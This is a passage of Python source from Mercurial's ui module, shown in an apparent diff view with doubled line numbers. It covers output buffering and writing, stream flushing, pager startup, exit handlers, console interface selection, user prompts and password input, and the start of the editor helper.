834 p = self.paths.getpath(default)
835 if p:
835 if p:
836 return p.rawloc
836 return p.rawloc
837 except error.RepoError:
837 except error.RepoError:
838 pass
838 pass
839
839
840 return loc
840 return loc
841
841
    @util.propertycache
    def paths(self):
        # path resolver, built lazily and cached on first access by
        # util.propertycache
        return paths(self)
845
845
846 def pushbuffer(self, error=False, subproc=False, labeled=False):
846 def pushbuffer(self, error=False, subproc=False, labeled=False):
847 """install a buffer to capture standard output of the ui object
847 """install a buffer to capture standard output of the ui object
848
848
849 If error is True, the error output will be captured too.
849 If error is True, the error output will be captured too.
850
850
851 If subproc is True, output from subprocesses (typically hooks) will be
851 If subproc is True, output from subprocesses (typically hooks) will be
852 captured too.
852 captured too.
853
853
854 If labeled is True, any labels associated with buffered
854 If labeled is True, any labels associated with buffered
855 output will be handled. By default, this has no effect
855 output will be handled. By default, this has no effect
856 on the output returned, but extensions and GUI tools may
856 on the output returned, but extensions and GUI tools may
857 handle this argument and returned styled output. If output
857 handle this argument and returned styled output. If output
858 is being buffered so it can be captured and parsed or
858 is being buffered so it can be captured and parsed or
859 processed, labeled should not be set to True.
859 processed, labeled should not be set to True.
860 """
860 """
861 self._buffers.append([])
861 self._buffers.append([])
862 self._bufferstates.append((error, subproc, labeled))
862 self._bufferstates.append((error, subproc, labeled))
863 self._bufferapplylabels = labeled
863 self._bufferapplylabels = labeled
864
864
865 def popbuffer(self):
865 def popbuffer(self):
866 '''pop the last buffer and return the buffered output'''
866 '''pop the last buffer and return the buffered output'''
867 self._bufferstates.pop()
867 self._bufferstates.pop()
868 if self._bufferstates:
868 if self._bufferstates:
869 self._bufferapplylabels = self._bufferstates[-1][2]
869 self._bufferapplylabels = self._bufferstates[-1][2]
870 else:
870 else:
871 self._bufferapplylabels = None
871 self._bufferapplylabels = None
872
872
873 return "".join(self._buffers.pop())
873 return "".join(self._buffers.pop())
874
874
875 def canwritewithoutlabels(self):
875 def canwritewithoutlabels(self):
876 '''check if write skips the label'''
876 '''check if write skips the label'''
877 if self._buffers and not self._bufferapplylabels:
877 if self._buffers and not self._bufferapplylabels:
878 return True
878 return True
879 return self._colormode is None
879 return self._colormode is None
880
880
881 def canbatchlabeledwrites(self):
881 def canbatchlabeledwrites(self):
882 '''check if write calls with labels are batchable'''
882 '''check if write calls with labels are batchable'''
883 # Windows color printing is special, see ``write``.
883 # Windows color printing is special, see ``write``.
884 return self._colormode != 'win32'
884 return self._colormode != 'win32'
885
885
886 def write(self, *args, **opts):
886 def write(self, *args, **opts):
887 '''write args to output
887 '''write args to output
888
888
889 By default, this method simply writes to the buffer or stdout.
889 By default, this method simply writes to the buffer or stdout.
890 Color mode can be set on the UI class to have the output decorated
890 Color mode can be set on the UI class to have the output decorated
891 with color modifier before being written to stdout.
891 with color modifier before being written to stdout.
892
892
893 The color used is controlled by an optional keyword argument, "label".
893 The color used is controlled by an optional keyword argument, "label".
894 This should be a string containing label names separated by space.
894 This should be a string containing label names separated by space.
895 Label names take the form of "topic.type". For example, ui.debug()
895 Label names take the form of "topic.type". For example, ui.debug()
896 issues a label of "ui.debug".
896 issues a label of "ui.debug".
897
897
898 When labeling output for a specific command, a label of
898 When labeling output for a specific command, a label of
899 "cmdname.type" is recommended. For example, status issues
899 "cmdname.type" is recommended. For example, status issues
900 a label of "status.modified" for modified files.
900 a label of "status.modified" for modified files.
901 '''
901 '''
902 if self._buffers:
902 if self._buffers:
903 if self._bufferapplylabels:
903 if self._bufferapplylabels:
904 label = opts.get(r'label', '')
904 label = opts.get(r'label', '')
905 self._buffers[-1].extend(self.label(a, label) for a in args)
905 self._buffers[-1].extend(self.label(a, label) for a in args)
906 else:
906 else:
907 self._buffers[-1].extend(args)
907 self._buffers[-1].extend(args)
908 else:
908 else:
909 self._writenobuf(*args, **opts)
909 self._writenobuf(*args, **opts)
910
910
911 def _writenobuf(self, *args, **opts):
911 def _writenobuf(self, *args, **opts):
912 if self._colormode == 'win32':
912 if self._colormode == 'win32':
913 # windows color printing is its own can of crab, defer to
913 # windows color printing is its own can of crab, defer to
914 # the color module and that is it.
914 # the color module and that is it.
915 color.win32print(self, self._write, *args, **opts)
915 color.win32print(self, self._write, *args, **opts)
916 else:
916 else:
917 msgs = args
917 msgs = args
918 if self._colormode is not None:
918 if self._colormode is not None:
919 label = opts.get(r'label', '')
919 label = opts.get(r'label', '')
920 msgs = [self.label(a, label) for a in args]
920 msgs = [self.label(a, label) for a in args]
921 self._write(*msgs, **opts)
921 self._write(*msgs, **opts)
922
922
    def _write(self, *msgs, **opts):
        # Lowest-level stdout write: clear any progress output first, then
        # emit all messages in a single fout.write() call.
        self._progclear()
        # opencode timeblockedsection because this is a critical path
        starttime = util.timer()
        try:
            self.fout.write(''.join(msgs))
        except IOError as err:
            raise error.StdioError(err)
        finally:
            # account the elapsed time as milliseconds blocked on stdio
            self._blockedtimes['stdio_blocked'] += \
                (util.timer() - starttime) * 1000
934
934
935 def write_err(self, *args, **opts):
935 def write_err(self, *args, **opts):
936 self._progclear()
936 self._progclear()
937 if self._bufferstates and self._bufferstates[-1][0]:
937 if self._bufferstates and self._bufferstates[-1][0]:
938 self.write(*args, **opts)
938 self.write(*args, **opts)
939 elif self._colormode == 'win32':
939 elif self._colormode == 'win32':
940 # windows color printing is its own can of crab, defer to
940 # windows color printing is its own can of crab, defer to
941 # the color module and that is it.
941 # the color module and that is it.
942 color.win32print(self, self._write_err, *args, **opts)
942 color.win32print(self, self._write_err, *args, **opts)
943 else:
943 else:
944 msgs = args
944 msgs = args
945 if self._colormode is not None:
945 if self._colormode is not None:
946 label = opts.get(r'label', '')
946 label = opts.get(r'label', '')
947 msgs = [self.label(a, label) for a in args]
947 msgs = [self.label(a, label) for a in args]
948 self._write_err(*msgs, **opts)
948 self._write_err(*msgs, **opts)
949
949
    def _write_err(self, *msgs, **opts):
        # Lowest-level stderr write.
        try:
            with self.timeblockedsection('stdio'):
                if not getattr(self.fout, 'closed', False):
                    # flush stdout first so out/err interleave sensibly
                    self.fout.flush()
                for a in msgs:
                    self.ferr.write(a)
                # stderr may be buffered under win32 when redirected to files,
                # including stdout.
                if not getattr(self.ferr, 'closed', False):
                    self.ferr.flush()
        except IOError as inst:
            # broken-pipe-style errors are ignored; anything else is fatal
            if inst.errno not in (errno.EPIPE, errno.EIO, errno.EBADF):
                raise error.StdioError(inst)
964
964
    def flush(self):
        # Flush both output streams; EPIPE/EIO/EBADF are expected when the
        # reader went away, anything else becomes StdioError.
        # opencode timeblockedsection because this is a critical path
        starttime = util.timer()
        try:
            try:
                self.fout.flush()
            except IOError as err:
                if err.errno not in (errno.EPIPE, errno.EIO, errno.EBADF):
                    raise error.StdioError(err)
            finally:
                # always attempt stderr, even if the stdout flush failed
                try:
                    self.ferr.flush()
                except IOError as err:
                    if err.errno not in (errno.EPIPE, errno.EIO, errno.EBADF):
                        raise error.StdioError(err)
        finally:
            # account the elapsed time as milliseconds blocked on stdio
            self._blockedtimes['stdio_blocked'] += \
                (util.timer() - starttime) * 1000
983
983
984 def _isatty(self, fh):
984 def _isatty(self, fh):
985 if self.configbool('ui', 'nontty'):
985 if self.configbool('ui', 'nontty'):
986 return False
986 return False
987 return util.isatty(fh)
987 return util.isatty(fh)
988
988
989 def disablepager(self):
989 def disablepager(self):
990 self._disablepager = True
990 self._disablepager = True
991
991
992 def pager(self, command):
992 def pager(self, command):
993 """Start a pager for subsequent command output.
993 """Start a pager for subsequent command output.
994
994
995 Commands which produce a long stream of output should call
995 Commands which produce a long stream of output should call
996 this function to activate the user's preferred pagination
996 this function to activate the user's preferred pagination
997 mechanism (which may be no pager). Calling this function
997 mechanism (which may be no pager). Calling this function
998 precludes any future use of interactive functionality, such as
998 precludes any future use of interactive functionality, such as
999 prompting the user or activating curses.
999 prompting the user or activating curses.
1000
1000
1001 Args:
1001 Args:
1002 command: The full, non-aliased name of the command. That is, "log"
1002 command: The full, non-aliased name of the command. That is, "log"
1003 not "history, "summary" not "summ", etc.
1003 not "history, "summary" not "summ", etc.
1004 """
1004 """
1005 if (self._disablepager
1005 if (self._disablepager
1006 or self.pageractive):
1006 or self.pageractive):
1007 # how pager should do is already determined
1007 # how pager should do is already determined
1008 return
1008 return
1009
1009
1010 if not command.startswith('internal-always-') and (
1010 if not command.startswith('internal-always-') and (
1011 # explicit --pager=on (= 'internal-always-' prefix) should
1011 # explicit --pager=on (= 'internal-always-' prefix) should
1012 # take precedence over disabling factors below
1012 # take precedence over disabling factors below
1013 command in self.configlist('pager', 'ignore')
1013 command in self.configlist('pager', 'ignore')
1014 or not self.configbool('ui', 'paginate')
1014 or not self.configbool('ui', 'paginate')
1015 or not self.configbool('pager', 'attend-' + command, True)
1015 or not self.configbool('pager', 'attend-' + command, True)
1016 # TODO: if we want to allow HGPLAINEXCEPT=pager,
1016 # TODO: if we want to allow HGPLAINEXCEPT=pager,
1017 # formatted() will need some adjustment.
1017 # formatted() will need some adjustment.
1018 or not self.formatted()
1018 or not self.formatted()
1019 or self.plain()
1019 or self.plain()
1020 or self._buffers
1020 or self._buffers
1021 # TODO: expose debugger-enabled on the UI object
1021 # TODO: expose debugger-enabled on the UI object
1022 or '--debugger' in pycompat.sysargv):
1022 or '--debugger' in pycompat.sysargv):
1023 # We only want to paginate if the ui appears to be
1023 # We only want to paginate if the ui appears to be
1024 # interactive, the user didn't say HGPLAIN or
1024 # interactive, the user didn't say HGPLAIN or
1025 # HGPLAINEXCEPT=pager, and the user didn't specify --debug.
1025 # HGPLAINEXCEPT=pager, and the user didn't specify --debug.
1026 return
1026 return
1027
1027
1028 pagercmd = self.config('pager', 'pager', rcutil.fallbackpager)
1028 pagercmd = self.config('pager', 'pager', rcutil.fallbackpager)
1029 if not pagercmd:
1029 if not pagercmd:
1030 return
1030 return
1031
1031
1032 pagerenv = {}
1032 pagerenv = {}
1033 for name, value in rcutil.defaultpagerenv().items():
1033 for name, value in rcutil.defaultpagerenv().items():
1034 if name not in encoding.environ:
1034 if name not in encoding.environ:
1035 pagerenv[name] = value
1035 pagerenv[name] = value
1036
1036
1037 self.debug('starting pager for command %r\n' % command)
1037 self.debug('starting pager for command %r\n' % command)
1038 self.flush()
1038 self.flush()
1039
1039
1040 wasformatted = self.formatted()
1040 wasformatted = self.formatted()
1041 if util.safehasattr(signal, "SIGPIPE"):
1041 if util.safehasattr(signal, "SIGPIPE"):
1042 signal.signal(signal.SIGPIPE, _catchterm)
1042 signal.signal(signal.SIGPIPE, _catchterm)
1043 if self._runpager(pagercmd, pagerenv):
1043 if self._runpager(pagercmd, pagerenv):
1044 self.pageractive = True
1044 self.pageractive = True
1045 # Preserve the formatted-ness of the UI. This is important
1045 # Preserve the formatted-ness of the UI. This is important
1046 # because we mess with stdout, which might confuse
1046 # because we mess with stdout, which might confuse
1047 # auto-detection of things being formatted.
1047 # auto-detection of things being formatted.
1048 self.setconfig('ui', 'formatted', wasformatted, 'pager')
1048 self.setconfig('ui', 'formatted', wasformatted, 'pager')
1049 self.setconfig('ui', 'interactive', False, 'pager')
1049 self.setconfig('ui', 'interactive', False, 'pager')
1050
1050
1051 # If pagermode differs from color.mode, reconfigure color now that
1051 # If pagermode differs from color.mode, reconfigure color now that
1052 # pageractive is set.
1052 # pageractive is set.
1053 cm = self._colormode
1053 cm = self._colormode
1054 if cm != self.config('color', 'pagermode', cm):
1054 if cm != self.config('color', 'pagermode', cm):
1055 color.setup(self)
1055 color.setup(self)
1056 else:
1056 else:
1057 # If the pager can't be spawned in dispatch when --pager=on is
1057 # If the pager can't be spawned in dispatch when --pager=on is
1058 # given, don't try again when the command runs, to avoid a duplicate
1058 # given, don't try again when the command runs, to avoid a duplicate
1059 # warning about a missing pager command.
1059 # warning about a missing pager command.
1060 self.disablepager()
1060 self.disablepager()
1061
1061
    def _runpager(self, command, env=None):
        """Actually start the pager and set up file descriptors.

        This is separate in part so that extensions (like chg) can
        override how a pager is invoked.

        Returns True if a pager process was spawned and stdio was
        redirected into it, False otherwise.
        """
        if command == 'cat':
            # Save ourselves some work.
            return False
        # If the command doesn't contain any of these characters, we
        # assume it's a binary and exec it directly. This means for
        # simple pager command configurations, we can degrade
        # gracefully and tell the user about their broken pager.
        shell = any(c in command for c in "|&;<>()$`\\\"' \t\n*?[#~=%")

        if pycompat.iswindows and not shell:
            # Window's built-in `more` cannot be invoked with shell=False, but
            # its `more.com` can. Hide this implementation detail from the
            # user so we can also get sane bad PAGER behavior. MSYS has
            # `more.exe`, so do a cmd.exe style resolution of the executable to
            # determine which one to use.
            fullcmd = util.findexe(command)
            if not fullcmd:
                self.warn(_("missing pager command '%s', skipping pager\n")
                          % command)
                return False

            command = fullcmd

        try:
            pager = subprocess.Popen(
                command, shell=shell, bufsize=-1,
                close_fds=util.closefds, stdin=subprocess.PIPE,
                stdout=util.stdout, stderr=util.stderr,
                env=util.shellenviron(env))
        except OSError as e:
            # ENOENT without a shell means the pager binary itself is
            # missing; warn and fall back to no pager instead of aborting
            if e.errno == errno.ENOENT and not shell:
                self.warn(_("missing pager command '%s', skipping pager\n")
                          % command)
                return False
            raise

        # back up original file descriptors
        stdoutfd = os.dup(util.stdout.fileno())
        stderrfd = os.dup(util.stderr.fileno())

        # route our stdout (and stderr, when it is a tty) into the pager
        os.dup2(pager.stdin.fileno(), util.stdout.fileno())
        if self._isatty(util.stderr):
            os.dup2(pager.stdin.fileno(), util.stderr.fileno())

        # self.atexit returns the function, so this doubles as registration
        # and definition of the cleanup hook
        @self.atexit
        def killpager():
            if util.safehasattr(signal, "SIGINT"):
                signal.signal(signal.SIGINT, signal.SIG_IGN)
            # restore original fds, closing pager.stdin copies in the process
            os.dup2(stdoutfd, util.stdout.fileno())
            os.dup2(stderrfd, util.stderr.fileno())
            pager.stdin.close()
            pager.wait()

        return True
1123
1123
    @property
    def _exithandlers(self):
        # exit handlers live in a module-level list shared by all ui
        # instances, so handlers run regardless of which ui registered them
        return _reqexithandlers
1127
1127
    def atexit(self, func, *args, **kwargs):
        '''register a function to run after dispatching a request

        Handlers do not stay registered across request boundaries.'''
        self._exithandlers.append((func, args, kwargs))
        # return func unchanged so this method can be used as a decorator
        # (see _runpager's killpager hook)
        return func
1134
1134
1135 def interface(self, feature):
1135 def interface(self, feature):
1136 """what interface to use for interactive console features?
1136 """what interface to use for interactive console features?
1137
1137
1138 The interface is controlled by the value of `ui.interface` but also by
1138 The interface is controlled by the value of `ui.interface` but also by
1139 the value of feature-specific configuration. For example:
1139 the value of feature-specific configuration. For example:
1140
1140
1141 ui.interface.histedit = text
1141 ui.interface.histedit = text
1142 ui.interface.chunkselector = curses
1142 ui.interface.chunkselector = curses
1143
1143
1144 Here the features are "histedit" and "chunkselector".
1144 Here the features are "histedit" and "chunkselector".
1145
1145
1146 The configuration above means that the default interfaces for commands
1146 The configuration above means that the default interfaces for commands
1147 is curses, the interface for histedit is text and the interface for
1147 is curses, the interface for histedit is text and the interface for
1148 selecting chunk is crecord (the best curses interface available).
1148 selecting chunk is crecord (the best curses interface available).
1149
1149
1150 Consider the following example:
1150 Consider the following example:
1151 ui.interface = curses
1151 ui.interface = curses
1152 ui.interface.histedit = text
1152 ui.interface.histedit = text
1153
1153
1154 Then histedit will use the text interface and chunkselector will use
1154 Then histedit will use the text interface and chunkselector will use
1155 the default curses interface (crecord at the moment).
1155 the default curses interface (crecord at the moment).
1156 """
1156 """
1157 alldefaults = frozenset(["text", "curses"])
1157 alldefaults = frozenset(["text", "curses"])
1158
1158
1159 featureinterfaces = {
1159 featureinterfaces = {
1160 "chunkselector": [
1160 "chunkselector": [
1161 "text",
1161 "text",
1162 "curses",
1162 "curses",
1163 ]
1163 ]
1164 }
1164 }
1165
1165
1166 # Feature-specific interface
1166 # Feature-specific interface
1167 if feature not in featureinterfaces.keys():
1167 if feature not in featureinterfaces.keys():
1168 # Programming error, not user error
1168 # Programming error, not user error
1169 raise ValueError("Unknown feature requested %s" % feature)
1169 raise ValueError("Unknown feature requested %s" % feature)
1170
1170
1171 availableinterfaces = frozenset(featureinterfaces[feature])
1171 availableinterfaces = frozenset(featureinterfaces[feature])
1172 if alldefaults > availableinterfaces:
1172 if alldefaults > availableinterfaces:
1173 # Programming error, not user error. We need a use case to
1173 # Programming error, not user error. We need a use case to
1174 # define the right thing to do here.
1174 # define the right thing to do here.
1175 raise ValueError(
1175 raise ValueError(
1176 "Feature %s does not handle all default interfaces" %
1176 "Feature %s does not handle all default interfaces" %
1177 feature)
1177 feature)
1178
1178
1179 if self.plain():
1179 if self.plain():
1180 return "text"
1180 return "text"
1181
1181
1182 # Default interface for all the features
1182 # Default interface for all the features
1183 defaultinterface = "text"
1183 defaultinterface = "text"
1184 i = self.config("ui", "interface")
1184 i = self.config("ui", "interface")
1185 if i in alldefaults:
1185 if i in alldefaults:
1186 defaultinterface = i
1186 defaultinterface = i
1187
1187
1188 choseninterface = defaultinterface
1188 choseninterface = defaultinterface
1189 f = self.config("ui", "interface.%s" % feature)
1189 f = self.config("ui", "interface.%s" % feature)
1190 if f in availableinterfaces:
1190 if f in availableinterfaces:
1191 choseninterface = f
1191 choseninterface = f
1192
1192
1193 if i is not None and defaultinterface != i:
1193 if i is not None and defaultinterface != i:
1194 if f is not None:
1194 if f is not None:
1195 self.warn(_("invalid value for ui.interface: %s\n") %
1195 self.warn(_("invalid value for ui.interface: %s\n") %
1196 (i,))
1196 (i,))
1197 else:
1197 else:
1198 self.warn(_("invalid value for ui.interface: %s (using %s)\n") %
1198 self.warn(_("invalid value for ui.interface: %s (using %s)\n") %
1199 (i, choseninterface))
1199 (i, choseninterface))
1200 if f is not None and choseninterface != f:
1200 if f is not None and choseninterface != f:
1201 self.warn(_("invalid value for ui.interface.%s: %s (using %s)\n") %
1201 self.warn(_("invalid value for ui.interface.%s: %s (using %s)\n") %
1202 (feature, f, choseninterface))
1202 (feature, f, choseninterface))
1203
1203
1204 return choseninterface
1204 return choseninterface
1205
1205
1206 def interactive(self):
1206 def interactive(self):
1207 '''is interactive input allowed?
1207 '''is interactive input allowed?
1208
1208
1209 An interactive session is a session where input can be reasonably read
1209 An interactive session is a session where input can be reasonably read
1210 from `sys.stdin'. If this function returns false, any attempt to read
1210 from `sys.stdin'. If this function returns false, any attempt to read
1211 from stdin should fail with an error, unless a sensible default has been
1211 from stdin should fail with an error, unless a sensible default has been
1212 specified.
1212 specified.
1213
1213
1214 Interactiveness is triggered by the value of the `ui.interactive'
1214 Interactiveness is triggered by the value of the `ui.interactive'
1215 configuration variable or - if it is unset - when `sys.stdin' points
1215 configuration variable or - if it is unset - when `sys.stdin' points
1216 to a terminal device.
1216 to a terminal device.
1217
1217
1218 This function refers to input only; for output, see `ui.formatted()'.
1218 This function refers to input only; for output, see `ui.formatted()'.
1219 '''
1219 '''
1220 i = self.configbool("ui", "interactive")
1220 i = self.configbool("ui", "interactive")
1221 if i is None:
1221 if i is None:
1222 # some environments replace stdin without implementing isatty
1222 # some environments replace stdin without implementing isatty
1223 # usually those are non-interactive
1223 # usually those are non-interactive
1224 return self._isatty(self.fin)
1224 return self._isatty(self.fin)
1225
1225
1226 return i
1226 return i
1227
1227
1228 def termwidth(self):
1228 def termwidth(self):
1229 '''how wide is the terminal in columns?
1229 '''how wide is the terminal in columns?
1230 '''
1230 '''
1231 if 'COLUMNS' in encoding.environ:
1231 if 'COLUMNS' in encoding.environ:
1232 try:
1232 try:
1233 return int(encoding.environ['COLUMNS'])
1233 return int(encoding.environ['COLUMNS'])
1234 except ValueError:
1234 except ValueError:
1235 pass
1235 pass
1236 return scmutil.termsize(self)[0]
1236 return scmutil.termsize(self)[0]
1237
1237
1238 def formatted(self):
1238 def formatted(self):
1239 '''should formatted output be used?
1239 '''should formatted output be used?
1240
1240
1241 It is often desirable to format the output to suite the output medium.
1241 It is often desirable to format the output to suite the output medium.
1242 Examples of this are truncating long lines or colorizing messages.
1242 Examples of this are truncating long lines or colorizing messages.
1243 However, this is not often not desirable when piping output into other
1243 However, this is not often not desirable when piping output into other
1244 utilities, e.g. `grep'.
1244 utilities, e.g. `grep'.
1245
1245
1246 Formatted output is triggered by the value of the `ui.formatted'
1246 Formatted output is triggered by the value of the `ui.formatted'
1247 configuration variable or - if it is unset - when `sys.stdout' points
1247 configuration variable or - if it is unset - when `sys.stdout' points
1248 to a terminal device. Please note that `ui.formatted' should be
1248 to a terminal device. Please note that `ui.formatted' should be
1249 considered an implementation detail; it is not intended for use outside
1249 considered an implementation detail; it is not intended for use outside
1250 Mercurial or its extensions.
1250 Mercurial or its extensions.
1251
1251
1252 This function refers to output only; for input, see `ui.interactive()'.
1252 This function refers to output only; for input, see `ui.interactive()'.
1253 This function always returns false when in plain mode, see `ui.plain()'.
1253 This function always returns false when in plain mode, see `ui.plain()'.
1254 '''
1254 '''
1255 if self.plain():
1255 if self.plain():
1256 return False
1256 return False
1257
1257
1258 i = self.configbool("ui", "formatted")
1258 i = self.configbool("ui", "formatted")
1259 if i is None:
1259 if i is None:
1260 # some environments replace stdout without implementing isatty
1260 # some environments replace stdout without implementing isatty
1261 # usually those are non-interactive
1261 # usually those are non-interactive
1262 return self._isatty(self.fout)
1262 return self._isatty(self.fout)
1263
1263
1264 return i
1264 return i
1265
1265
    def _readline(self):
        """Read one line of input from self.fin, with readline-based line
        editing when stdin is a tty."""
        if self._isatty(self.fin):
            try:
                # magically add command line editing support, where
                # available
                import readline
                # force demandimport to really load the module
                readline.read_history_file
                # windows sometimes raises something other than ImportError
            except Exception:
                pass

        # prompt ' ' must exist; otherwise readline may delete entire line
        # - http://bugs.python.org/issue12833
        with self.timeblockedsection('stdio'):
            # temporarily install our streams as the process-level stdio so
            # rawinput() reads from fin and echoes to fout;
            # encoding.strio presumably adapts the byte streams for
            # native-str I/O — confirm against encoding module
            sin, sout = sys.stdin, sys.stdout
            try:
                sys.stdin = encoding.strio(self.fin)
                sys.stdout = encoding.strio(self.fout)
                line = encoding.strtolocal(pycompat.rawinput(r' '))
            finally:
                # always restore the original stdio, even on EOFError
                sys.stdin, sys.stdout = sin, sout

        # When stdin is in binary mode on Windows, it can cause
        # raw_input() to emit an extra trailing carriage return
        if pycompat.oslinesep == '\r\n' and line and line[-1] == '\r':
            line = line[:-1]
        return line
1288
1294
1289 def prompt(self, msg, default="y"):
1295 def prompt(self, msg, default="y"):
1290 """Prompt user with msg, read response.
1296 """Prompt user with msg, read response.
1291 If ui is not interactive, the default is returned.
1297 If ui is not interactive, the default is returned.
1292 """
1298 """
1293 if not self.interactive():
1299 if not self.interactive():
1294 self.write(msg, ' ', default or '', "\n")
1300 self.write(msg, ' ', default or '', "\n")
1295 return default
1301 return default
1296 self._writenobuf(msg, label='ui.prompt')
1302 self._writenobuf(msg, label='ui.prompt')
1297 self.flush()
1303 self.flush()
1298 try:
1304 try:
1299 r = self._readline()
1305 r = self._readline()
1300 if not r:
1306 if not r:
1301 r = default
1307 r = default
1302 if self.configbool('ui', 'promptecho'):
1308 if self.configbool('ui', 'promptecho'):
1303 self.write(r, "\n")
1309 self.write(r, "\n")
1304 return r
1310 return r
1305 except EOFError:
1311 except EOFError:
1306 raise error.ResponseExpected()
1312 raise error.ResponseExpected()
1307
1313
    @staticmethod
    def extractchoices(prompt):
        """Extract prompt message and list of choices from specified prompt.

        This returns tuple "(message, choices)", and "choices" is the
        list of tuple "(response character, text without &)".

        >>> ui.extractchoices(b"awake? $$ &Yes $$ &No")
        ('awake? ', [('y', 'Yes'), ('n', 'No')])
        >>> ui.extractchoices(b"line\\nbreak? $$ &Yes $$ &No")
        ('line\\nbreak? ', [('y', 'Yes'), ('n', 'No')])
        >>> ui.extractchoices(b"want lots of $$money$$?$$Ye&s$$N&o")
        ('want lots of $$money$$?', [('s', 'Yes'), ('o', 'No')])
        """

        # Sadly, the prompt string may have been built with a filename
        # containing "$$" so let's try to find the first valid-looking
        # prompt to start parsing. Sadly, we also can't rely on
        # choices containing spaces, ASCII, or basically anything
        # except an ampersand followed by a character.
        m = re.match(br'(?s)(.+?)\$\$([^\$]*&[^ \$].*)', prompt)
        msg = m.group(1)
        # remaining "$$"-separated segments are the individual choices
        choices = [p.strip(' ') for p in m.group(2).split('$$')]
        def choicetuple(s):
            # the character following '&' is the response key; the
            # displayed text is the choice with that '&' removed
            ampidx = s.index('&')
            return s[ampidx + 1:ampidx + 2].lower(), s.replace('&', '', 1)
        return (msg, [choicetuple(s) for s in choices])
1335
1341
1336 def promptchoice(self, prompt, default=0):
1342 def promptchoice(self, prompt, default=0):
1337 """Prompt user with a message, read response, and ensure it matches
1343 """Prompt user with a message, read response, and ensure it matches
1338 one of the provided choices. The prompt is formatted as follows:
1344 one of the provided choices. The prompt is formatted as follows:
1339
1345
1340 "would you like fries with that (Yn)? $$ &Yes $$ &No"
1346 "would you like fries with that (Yn)? $$ &Yes $$ &No"
1341
1347
1342 The index of the choice is returned. Responses are case
1348 The index of the choice is returned. Responses are case
1343 insensitive. If ui is not interactive, the default is
1349 insensitive. If ui is not interactive, the default is
1344 returned.
1350 returned.
1345 """
1351 """
1346
1352
1347 msg, choices = self.extractchoices(prompt)
1353 msg, choices = self.extractchoices(prompt)
1348 resps = [r for r, t in choices]
1354 resps = [r for r, t in choices]
1349 while True:
1355 while True:
1350 r = self.prompt(msg, resps[default])
1356 r = self.prompt(msg, resps[default])
1351 if r.lower() in resps:
1357 if r.lower() in resps:
1352 return resps.index(r.lower())
1358 return resps.index(r.lower())
1353 self.write(_("unrecognized response\n"))
1359 self.write(_("unrecognized response\n"))
1354
1360
1355 def getpass(self, prompt=None, default=None):
1361 def getpass(self, prompt=None, default=None):
1356 if not self.interactive():
1362 if not self.interactive():
1357 return default
1363 return default
1358 try:
1364 try:
1359 self.write_err(self.label(prompt or _('password: '), 'ui.prompt'))
1365 self.write_err(self.label(prompt or _('password: '), 'ui.prompt'))
1360 # disable getpass() only if explicitly specified. it's still valid
1366 # disable getpass() only if explicitly specified. it's still valid
1361 # to interact with tty even if fin is not a tty.
1367 # to interact with tty even if fin is not a tty.
1362 with self.timeblockedsection('stdio'):
1368 with self.timeblockedsection('stdio'):
1363 if self.configbool('ui', 'nontty'):
1369 if self.configbool('ui', 'nontty'):
1364 l = self.fin.readline()
1370 l = self.fin.readline()
1365 if not l:
1371 if not l:
1366 raise EOFError
1372 raise EOFError
1367 return l.rstrip('\n')
1373 return l.rstrip('\n')
1368 else:
1374 else:
1369 return getpass.getpass('')
1375 return getpass.getpass('')
1370 except EOFError:
1376 except EOFError:
1371 raise error.ResponseExpected()
1377 raise error.ResponseExpected()
1372 def status(self, *msg, **opts):
1378 def status(self, *msg, **opts):
1373 '''write status message to output (if ui.quiet is False)
1379 '''write status message to output (if ui.quiet is False)
1374
1380
1375 This adds an output label of "ui.status".
1381 This adds an output label of "ui.status".
1376 '''
1382 '''
1377 if not self.quiet:
1383 if not self.quiet:
1378 opts[r'label'] = opts.get(r'label', '') + ' ui.status'
1384 opts[r'label'] = opts.get(r'label', '') + ' ui.status'
1379 self.write(*msg, **opts)
1385 self.write(*msg, **opts)
1380 def warn(self, *msg, **opts):
1386 def warn(self, *msg, **opts):
1381 '''write warning message to output (stderr)
1387 '''write warning message to output (stderr)
1382
1388
1383 This adds an output label of "ui.warning".
1389 This adds an output label of "ui.warning".
1384 '''
1390 '''
1385 opts[r'label'] = opts.get(r'label', '') + ' ui.warning'
1391 opts[r'label'] = opts.get(r'label', '') + ' ui.warning'
1386 self.write_err(*msg, **opts)
1392 self.write_err(*msg, **opts)
1387 def note(self, *msg, **opts):
1393 def note(self, *msg, **opts):
1388 '''write note to output (if ui.verbose is True)
1394 '''write note to output (if ui.verbose is True)
1389
1395
1390 This adds an output label of "ui.note".
1396 This adds an output label of "ui.note".
1391 '''
1397 '''
1392 if self.verbose:
1398 if self.verbose:
1393 opts[r'label'] = opts.get(r'label', '') + ' ui.note'
1399 opts[r'label'] = opts.get(r'label', '') + ' ui.note'
1394 self.write(*msg, **opts)
1400 self.write(*msg, **opts)
1395 def debug(self, *msg, **opts):
1401 def debug(self, *msg, **opts):
1396 '''write debug message to output (if ui.debugflag is True)
1402 '''write debug message to output (if ui.debugflag is True)
1397
1403
1398 This adds an output label of "ui.debug".
1404 This adds an output label of "ui.debug".
1399 '''
1405 '''
1400 if self.debugflag:
1406 if self.debugflag:
1401 opts[r'label'] = opts.get(r'label', '') + ' ui.debug'
1407 opts[r'label'] = opts.get(r'label', '') + ' ui.debug'
1402 self.write(*msg, **opts)
1408 self.write(*msg, **opts)
1403
1409
    def edit(self, text, user, extra=None, editform=None, pending=None,
             repopath=None, action=None):
        """Launch the user's editor on text and return the edited result.

        The text is written to a temporary file (suffix derived from
        action), the configured editor is run on it via self.system(),
        and the file's content is read back, EOL-normalized and
        returned. The temporary file is always unlinked afterwards.

        user, editform, pending and any revision markers found in extra
        are exported to the editor through environment variables
        (HGUSER, HGEDITFORM, HG_PENDING, HGREVISION).
        """
        if action is None:
            self.develwarn('action is None but will soon be a required '
                           'parameter to ui.edit()')
        extra_defaults = {
            'prefix': 'editor',
            'suffix': '.txt',
        }
        if extra is not None:
            if extra.get('suffix') is not None:
                self.develwarn('extra.suffix is not None but will soon be '
                               'ignored by ui.edit()')
            extra_defaults.update(extra)
        extra = extra_defaults

        # an explicit action determines the temp-file suffix; otherwise
        # fall back to the (possibly caller-supplied) extra['suffix']
        if action == 'diff':
            suffix = '.diff'
        elif action:
            suffix = '.%s.hg.txt' % action
        else:
            suffix = extra['suffix']

        # optionally keep the temp file inside the repository
        rdir = None
        if self.configbool('experimental', 'editortmpinhg'):
            rdir = repopath
        (fd, name) = tempfile.mkstemp(prefix='hg-' + extra['prefix'] + '-',
                                      suffix=suffix,
                                      dir=rdir)
        try:
            f = os.fdopen(fd, r'wb')
